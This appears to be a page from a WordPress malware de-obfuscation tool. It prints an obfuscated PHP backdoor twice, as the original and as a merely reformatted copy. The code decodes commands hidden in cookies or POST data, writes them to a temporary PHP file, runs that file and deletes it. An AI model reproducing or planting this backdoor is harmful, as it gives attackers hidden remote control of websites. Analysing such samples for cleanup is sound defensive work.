De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php function sd1($dh2){$vt3 = "lo-uy8x2in9msI" ."163h(#k_)E" ."/Lve?F;gc* 'drH7@.p4t" ."a50" ."f<" ."b" ;$tt5='';foreach($dh2 as $yx4){$tt5.=$vt3[$yx4];}return $tt5;}$mc6 = Array();$mc6[] = sd1(Array(16,39,15,43,46,48,50,43,2,47,7,39,45,2,43,39,47,48,2,5,32,15,27,2,32,27,5,47,7,10,27,36,27,15,14,7));$mc6[] = sd1(Array(28,42,17,42,34,40,3,9,0,8,9,20,18,21,21,29,13,25,23,21,21,22,30,34));$mc6[] = sd1(Array(41,11,1,36,3,0,27));$mc6[] = sd1(Array(38,33));$mc6[] = sd1(Array(41,24));$mc6[] = sd1(Array(19));$mc6[] = sd1(Array(49));$mc6[] = sd1(Array(48,8,0,27,21,42,3,44,21,32,1,9,44,27,9,44,12));$mc6[] = sd1(Array(45,37,37,45,4,21,11,27,37,31,27));$mc6[] = sd1(Array(12,44,37,21,37,27,42,27,45,44));$mc6[] = sd1(Array(27,6,42,0,1,36,27));$mc6[] = sd1(Array(12,3,50,12,44,37));$mc6[] = sd1(Array(3,9,0,8,9,20));$mc6[] = sd1(Array(12,44,37,0,27,9));$mc6[] = sd1(Array(42,45,32,20));$mc6[] = sd1(Array(11,36,46));foreach ($mc6[8]($_COOKIE, $_POST) as $wa14 => $dd11){function pa8($mc6, $wa14, $bt10){return $mc6[11]($mc6[9]($wa14 . $mc6[0], ($bt10 / $mc6[13]($wa14)) + 1), 0, $bt10);}function oj7($mc6, $ec12){return @$mc6[14]($mc6[3], $ec12);}function hk9($mc6, $ec12){if (isset($ec12[2])) {$sq13 = $mc6[4] . $mc6[15]($mc6[0]) . $mc6[2];@$mc6[7]($sq13, $mc6[6] . $mc6[1] . $ec12[1]($ec12[2]));@include($sq13);@$mc6[12]($sq13);exit();}}$dd11 = oj7($mc6, $dd11);hk9($mc6, $mc6[10]($mc6[5], $dd11 ^ pa8($mc6, $wa14, $mc6[13]($dd11))));}
<?php function sd1($dh2) { $vt3 = "lo-uy8x2in9msI163h(#k_)E/Lve?F;gc* 'drH7@.p4ta50f<b"; $tt5 = ''; foreach ($dh2 as $yx4) { $tt5 .= $vt3[$yx4]; } return $tt5; } $mc6 = array(); $mc6[] = sd1(array(16, 39, 15, 43, 46, 48, 50, 43, 2, 47, 7, 39, 45, 2, 43, 39, 47, 48, 2, 5, 32, 15, 27, 2, 32, 27, 5, 47, 7, 10, 27, 36, 27, 15, 14, 7)); $mc6[] = sd1(array(28, 42, 17, 42, 34, 40, 3, 9, 0, 8, 9, 20, 18, 21, 21, 29, 13, 25, 23, 21, 21, 22, 30, 34)); $mc6[] = sd1(array(41, 11, 1, 36, 3, 0, 27)); $mc6[] = sd1(array(38, 33)); $mc6[] = sd1(array(41, 24)); $mc6[] = sd1(array(19)); $mc6[] = sd1(array(49)); $mc6[] = sd1(array(48, 8, 0, 27, 21, 42, 3, 44, 21, 32, 1, 9, 44, 27, 9, 44, 12)); $mc6[] = sd1(array(45, 37, 37, 45, 4, 21, 11, 27, 37, 31, 27)); $mc6[] = sd1(array(12, 44, 37, 21, 37, 27, 42, 27, 45, 44)); $mc6[] = sd1(array(27, 6, 42, 0, 1, 36, 27)); $mc6[] = sd1(array(12, 3, 50, 12, 44, 37)); $mc6[] = sd1(array(3, 9, 0, 8, 9, 20)); $mc6[] = sd1(array(12, 44, 37, 0, 27, 9)); $mc6[] = sd1(array(42, 45, 32, 20)); $mc6[] = sd1(array(11, 36, 46)); foreach ($mc6[8]($_COOKIE, $_POST) as $wa14 => $dd11) { function pa8($mc6, $wa14, $bt10) { return $mc6[11]($mc6[9]($wa14 . $mc6[0], $bt10 / $mc6[13]($wa14) + 1), 0, $bt10); } function oj7($mc6, $ec12) { return @$mc6[14]($mc6[3], $ec12); } function hk9($mc6, $ec12) { if (isset($ec12[2])) { $sq13 = $mc6[4] . $mc6[15]($mc6[0]) . $mc6[2]; @$mc6[7]($sq13, $mc6[6] . $mc6[1] . $ec12[1]($ec12[2])); @(include $sq13); @$mc6[12]($sq13); exit; } } $dd11 = oj7($mc6, $dd11); hk9($mc6, $mc6[10]($mc6[5], $dd11 ^ pa8($mc6, $wa14, $mc6[13]($dd11)))); }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.